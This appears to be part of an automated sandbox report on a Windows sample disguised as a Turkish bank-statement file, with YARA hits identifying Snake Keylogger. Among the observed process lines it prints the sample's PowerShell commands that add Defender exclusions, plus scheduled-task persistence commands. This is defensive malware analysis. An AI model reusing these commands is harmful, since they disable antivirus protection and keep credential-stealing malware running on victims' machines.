Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189CA08	16_2_0189CA08
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_01899DE0	16_2_01899DE0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189CCD8	16_2_0189CCD8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189CFAA	16_2_0189CFAA
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_01896FC8	16_2_01896FC8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189F631	16_2_0189F631
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_018929EC	16_2_018929EC
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_018939F0	16_2_018939F0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189E97A	16_2_0189E97A
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_0189FA88	16_2_0189FA88
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_01893E09	16_2_01893E09
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E91E80	16_2_06E91E80
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E917A0	16_2_06E917A0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E90B30	16_2_06E90B30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E95028	16_2_06E95028
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E99C18	16_2_06E99C18
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E92968	16_2_06E92968
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E99548	16_2_06E99548
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9EAF8	16_2_06E9EAF8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9E6AF	16_2_06E9E6AF
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9E6A0	16_2_06E9E6A0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9E6B0	16_2_06E9E6B0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E91E70	16_2_06E91E70
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9E249	16_2_06E9E249
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9E258	16_2_06E9E258
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9DE00	16_2_06E9DE00
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E98BA0	16_2_06E98BA0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9F3B8	16_2_06E9F3B8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9178F	16_2_06E9178F
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9EF60	16_2_06E9EF60
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9EF51	16_2_06E9EF51
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E90B20	16_2_06E90B20
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9EB08	16_2_06E9EB08
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9D0F8	16_2_06E9D0F8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9CCA0	16_2_06E9CCA0
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9CC8F	16_2_06E9CC8F
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9FC68	16_2_06E9FC68
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E90040	16_2_06E90040
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9FC5E	16_2_06E9FC5E
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E90023	16_2_06E90023
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9F801	16_2_06E9F801
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E95018	16_2_06E95018
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9F810	16_2_06E9F810
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9DDFF	16_2_06E9DDFF
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9DDF1	16_2_06E9DDF1
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9D9A8	16_2_06E9D9A8
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9D999	16_2_06E9D999
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9D540	16_2_06E9D540
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Code function: 16_2_06E9D550	16_2_06E9D550

Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2334849877.0000000007250000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.000000000377A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.000000000377A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000000.2246108127.00000000003B6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQqvl.exeJ vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2312501128.000000000277D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2336451206.0000000007A80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2304993698.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4710756454.0000000000441000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4711200991.0000000000D37000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Hesap_Hareketleri_10122024_html.exe
Source: Hesap_Hareketleri_10122024_html.exe	Binary or memory string: OriginalFilenameQqvl.exeJ vs Hesap_Hareketleri_10122024_html.exe

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.UDYiGmDlq.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.UDYiGmDlq.exe.3a5d8a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.UDYiGmDlq.exe.3a1a880.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Hesap_Hareketleri_10122024_html.exe PID: 2212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: UDYiGmDlq.exe PID: 7312, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Hesap_Hareketleri_10122024_html.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UDYiGmDlq.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.392cbb8.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.38e9b98.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.SetAccessControl
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, FGcVvV1pEpNhg2xaE1.cs	Security API names: _0020.AddAccessRule
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.39c4c48.3.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.7a80000.5.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.Hesap_Hareketleri_10122024_html.exe.3823ee0.0.raw.unpack, J9lmFdxVpVxkgbW2mF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@3/3

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Mutant created: \Sessions\1\BaseNamedObjects\gRWSYlbOaLQjte
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp

Jump to behavior

Source: Hesap_Hareketleri_10122024_html.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Hesap_Hareketleri_10122024_html.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.0000000003573000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Hesap_Hareketleri_10122024_html.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

File read: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Process created: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp"	Jump to behavior
